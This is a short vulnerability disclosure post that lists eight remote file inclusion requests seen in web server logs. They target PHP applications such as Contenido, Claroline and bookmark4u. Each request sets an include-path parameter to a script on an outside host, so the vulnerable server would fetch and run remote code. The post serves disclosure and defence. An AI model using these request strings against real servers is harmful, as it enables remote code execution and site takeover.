[This was originally disclosed on the VIM mail list. VulnDB IDs 90794, 90795, 90796. This was the result of watching Apache logs on attrition.org and observing a wide variety of RFI attacks. I started comparing some of the scripts being attempted with OSVDB and noticed some were not found. That means these were essentially 0days being exploited in the wild.]
Quick searches didn’t find these in OSVDB. I haven’t had time to check the
other VDBs.
/contenido/external/frontend/news.php?cfg[path][includes]=http://www.jef.at/vn
/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pusanfood.com/bbs//skin/zero_vote//data/res.txt??
/claroline/tracking/userLog.php?rootSys=http://www.free-ddl.com/siteadmin/test.txt%3f%3f%3f
/admin/cron_pop.php?adm_path=http://www.smagz.com/bo.do%3f%3f
/class/class.dashboard_lms.php?where_framework=http://www.randdesign.de/ppoint/include/main.txt??
/modules/TotalCalendar/validcode.php?inc_dir=http://www.geocities.com/injitinjitsemut/cmd1.txt??
/classified_right.php?language_dir=http://www.gracesalesco.com/gracesalescocalendar//tools/test.txt??
/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.unescoulsan.org/bbs//data/safe1.txt???